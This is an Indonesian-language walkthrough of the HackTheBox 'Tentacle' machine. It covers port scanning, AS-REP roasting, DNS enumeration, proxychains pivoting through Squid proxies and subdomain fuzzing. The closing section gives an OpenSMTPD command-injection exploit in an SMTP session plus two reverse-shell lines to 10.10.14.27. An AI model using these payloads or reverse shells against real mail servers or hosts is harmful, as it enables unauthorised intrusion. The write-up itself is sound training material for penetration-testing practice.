Proxychains & DNS

Author : anonputraid

Tentacle

Berikut Adalah Informasi Mengenai Cara Menyelesaikan Box Meshine Tentacle Pada Hackthebox , Tujuan Catatan Informasi Seperti Ini Agar Bisa Terus Mengingat Dan Mengulang Apa Yang Telah Dipelajari Sebelum Nya.

Starting point (Foothold Section)

Port Scan : 

nmap -sV -sC -sT  10.10.10.224 -oN nmap.scan

Output : 

3128/tcp open   http-proxy   Squid http proxy 4.11
|_http-server-header: squid/4.11
|_http-title: ERROR: The requested URL could not be retrieved

Scan Nmap menunjukkan 3128 port. Yang merupakan Proxy squid. Juga membuka 10.10.10.224:3128 memberi kami dua informasi. nama pengguna [email protected] dan subdomain srv01.realcorp.htb.

Generate Hash Brute Keyberos :

Menjalankan pemanggangan AS-REP untuk nama pengguna tersebut memberi kami hash yang merupakan ** RABBIT HOLE **:

Download Script Disini : GetNPUser.py

./GetNPUsers.py -dc-ip REALCORP.HTB REALCORP.HTB/j.nakazawa -no-pass -format hashcat | tee kerbrute-hash

Find Domain Using DNS :

Sekarang menjalankan Enum DNS kita bisa mendapatkan 3 host:

Downloads Wordlists DIsini : Subdomain Top 1 Million 110000

dnsenum --threads 64 --dnsserver 10.10.10.224 -f /usr/share/wordlists/DNS/subdomains-top1million-110000.txt realcorp.htb

Output : 

ns.realcorp.htb.                        259200  IN    A        10.197.243.77
proxy.realcorp.htb.                     259200  IN    CNAME    ns.realcorp.htb.
ns.realcorp.htb.                        259200  IN    A        10.197.243.77
wpad.realcorp.htb.                      259200  IN    A        10.197.243.31
ns.realcorp.htb.                        259200  IN    A        10.197.243.77

Tetapi tidak ada IP internal yang dapat diakses. Jadi kami menambahkan proxy di proxychain kami lalu menjalankan nmap di 127.0.0.1 dan hasilnya memiliki port yang sama kecuali sekarang port baru Kpasswd5.

sudo nano /etc/proxychains4.conf
Tambahkan http 10.10.10.224 3128

Lalu Jalankan Perintah Berikut Ini : 

proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN pivoted_77 127.0.0.1

Tetapi dari sana juga kami tidak dapat mengakses IP apa pun, jadi mungkin proxy tidak menyukai lalu lintas masuk. Jadi kami menambahkan entri lain di proxychain kami untuk merutekan paket melalui 10.10.10.224:3128 -> 127.0.0.1:3128. Tapi kemudian tiba-tiba IP 10.197.243.77 dapat diakses.

sudo nano /etc/proxychains4.conf
Tambahkan http 10.10.10.224 3128
Tambahkan http 127.0.0.1 3128

Lalu Setelah Itu Jalankan Perintah Berikut : 

proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN pivoted_77 10.197.243.77

Sekarang, di sini juga kami memiliki port squid 3128, dengan menambahkan proxy ini lagi sekarang kami mendapat IP lain 10.197.243.31 menjadi dapat Diakses dan membuka port 80. Jalankan Perintah Berikut :

Tambahkan : 

http 10.197.243.77 3128
proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN pivoted_77 10.197.243.31

Sekarang kami menjalankan WFUZZ untuk semua subdomain atau Dirbuster. Dirbuster tidak membuat apa-apa kecuali Subdomain enumeration memberi saya subdomain wpad.

Download Wordlists Disini : Subdomain Top 1 Million 20000

proxychains4 -q wfuzz -t64 -c -z file,/usr/share/wordlists/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ.realcorp.htb" --hh 4057 http://10.197.243.31/ | tee wfuzz.scan

Lalu Tambahkan Domain : 

wpad.realcorp.htb

Sekarang wpad adalah petunjuk yang sangat kuat bahwa itu adalah subdomain wpad sehingga kami mendapatkan file wpad.dat yang merupakan file konfigurasi default : 

sudo proxychains curl http://wpad.realcorp.htb/wpad.dat

Ouput : 

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain  ...  10.10.10.224:3128  ...  127.0.0.1:3128  ...  10.197.243.77:3128  ...  10.197.243.31:80     ...  OK
function FindProxyForURL(url, host) {
   if (dnsDomainIs(host, "realcorp.htb"))
       return "DIRECT";
   if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
       return "DIRECT";
       
      return "PROXY proxy.realcorp.htb:3128";
}

Jadi, kita sudah mengetahui domain 10.197.243.0, sekarang kita perlu memeriksa 10.241.251.0. Yang mana saya berlari nampan terhadap seluruh /24 oktet dengan port teratas dan melihat bahwa 10.241.251.113 memiliki port SMTP terbuka dan menjalankan OpenSMTPD.

proxychains nmap -sT --min-rate 2500 -Pn 10.241.251.0/24
proxychains nmap -sT -sC -sV --min-rate 2500 -Pn 10.241.251.113
proxychains nmap -sT -sC -sV -p 25 -Pn 10.241.251.113

Output : 

PORT  STATE SERVICE VERSION
25/tcp open  smtp    OpenSMTPD
| smtp-commands: smtp.realcorp.htb Hello nmap.scanme.org [10.241.251.1], pleased to meet you, 8BITMIME,  ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP,
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact [email protected] 2.0.0 with full  details 2.0.0 End of HELP inf o
Service Info: Host: smtp.realcorp.htb

Sumber Exploit : 2020 01 28 cve 20 nsmtpd

kami melihat bahwa RCPT TO default: <root> tidak berfungsi jadi kami mengubah ke RCPT TO: <[email protected]> sebagai gantinya dan viola, kami memiliki shell terbalik. Sekarang : 

sudo proxychains nc 10.241.251.113 25

HELO hacktivity
MAIL FROM:<;for d in x t J z 5 o N G K 9 3 B 1 n Y;do read d;done;bash;exit 0;>
RCPT TO:<[email protected]>
DATA

#
#
#
#
#
#
#
#
#
#
#
# 
#
#
#
0<&95-;exec 95<>/dev/tcp/10.10.14.27/1337;sh <&95 >&95 2>&95

Lalu Lakukan Ini : 

bash -c 'exec bash -i &>/dev/tcp/10.10.14.27/1334 <&1'

Last updated

Was this helpful?